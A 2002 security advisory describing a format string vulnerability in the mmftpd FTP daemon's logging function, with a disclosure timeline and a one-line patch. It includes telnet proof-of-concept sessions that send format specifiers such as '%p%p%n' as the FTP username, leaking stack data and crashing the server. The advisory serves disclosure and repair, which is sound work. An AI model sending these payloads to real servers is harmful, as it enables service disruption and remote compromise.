[CERT-intexxia] mmftpd FTP Daemon Format String Vulnerability

From: Benoît Roussel (benoit.rousselat_private)
Date: Wed Jun 12 2002 - 05:58:37 PDT

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    Hash: SHA1
    SECURITY ADVISORY                                            INTEXXIA(c)
    04 06 2002                                               ID #1053-040602
    TITLE   : mmftpd FTP Daemon Format String Vulnerability
    CREDITS : Guillaume Pelat / INTEXXIA
            mmftpd <= 0.0.7
            "mmftpd is a  secure FTP server  that runs as a normal user, and
    supports  virtual  users  only. Each user may have specific permissions,
    including  the  maximum  home  directory  size limit and download/upload
    speeds. It runs on both  BSD and Linux systems, and is ideal for a setup
    with many  Web virtual host customers. It was written from scratch, with
    no borrowed code."
            The  Laboratory  intexxia  found  a  remotely exploitable format
    string vulnerability in the mmftpd FTP deamon .
            There  is  a  format  string  vulnerability  in the 'mmsyslog()'
    function  of the  'mmftpd ' program. This function acts like 'vsyslog()'
    if '__GLIBC__' is  defined.  It calls  the 'syslog(3)' function  with  a
    format string that can be defined by a remote user. It is not  necessary
    to authenticate to exploit this vulnerability.
    Successful exploitation of this  flaw can  allow a remote user to obtain
    a local account on the target machine.
    test:~$ telnet test.lab.intexxia.com 21
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
    USER %p%p 
    331 Password required for this user
    PASS foo
    530 Invalid login
    In the log file :
    mmftpd[1875]: 3CFC80CF Failed login for 0x80598800x80ae73c (unexisting)
    test:~$ telnet test.lab.intexxia.com 21
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
    USER %p%p%n
    331 Password required for this user
    PASS foo
    Connection closed by foreign host.
    test:~$ telnet test.lab.intexxia.com 21
    Trying x.x.x.x...
    telnet: Unable to connect to remote host: Connection refused
    The following patch corrects this issue :
    diff -dru mmftpd-0.0.7/mmlib/mmlog.c mmftpd-0.0.7.fixed/mmlib/mmlog.c
    - --- mmftpd-0.0.7/mmlib/mmlog.c Mon May 13 08:20:13 2002
    +++ mmftpd-0.0.7.fixed/mmlib/mmlog.c Tue Jun  4 11:25:03 2002
    @@ -70,7 +70,7 @@
      va_start(lst, fmt);
      vsnprintf(buf, 1023, fmt, lst);
    - - syslog(LOG_NOTICE, buf);
    + syslog(LOG_NOTICE, "%s", buf);
    A new version including this patch is available at the following URL :
            04-06-2002 : This bulletin was sent to Matthew Mondor.
            05-06-2002 : Matthew   was  very   reactive  and  confirmed  the
                         vulnerability. He released a new version.
            mmftpd is registered trademark.
            Intexxia provides this  information  as a public service and "as
    is". Intexxia  will not be  held accountable for  any damage or distress
    caused by the proper or improper usage of these materials.
            (c) intexxia 2002. This  document is property  of intexxia. Feel
    free to use and distribute  this material as long as  credit is given to
    intexxia and the author.
    CERT intexxia                                          certat_private
    INTEXXIA                                         http://www.intexxia.com
    171, av. Georges Clemenceau                 Standard : +33 1 55 69 49 10
    92024 Nanterre Cedex - France                    Fax : +33 1 55 69 78 80
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